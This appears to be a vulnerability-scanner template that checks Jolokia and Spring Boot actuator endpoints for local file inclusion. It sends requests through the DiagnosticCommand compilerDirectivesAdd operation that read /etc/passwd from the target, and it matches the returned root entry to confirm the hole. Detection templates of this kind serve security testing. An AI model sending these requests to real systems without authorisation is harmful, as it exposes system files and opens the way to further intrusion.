id: jolokia-unauthenticated-lfi info: name: Jolokia - Local File Inclusion author: dhiyaneshDk severity: high description: Jolokia is vulnerable to local file inclusion via compilerDirectivesAdd. reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 tags: jolokia,springboot,tomcat,lfi metadata: max-request: 2 http: - method: GET path: - "{{BaseURL}}/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd" - "{{BaseURL}}/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd" stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - "compilerDirectivesAdd" condition: and - type: status status: - 200 # Enhanced by mp on 2022/08/03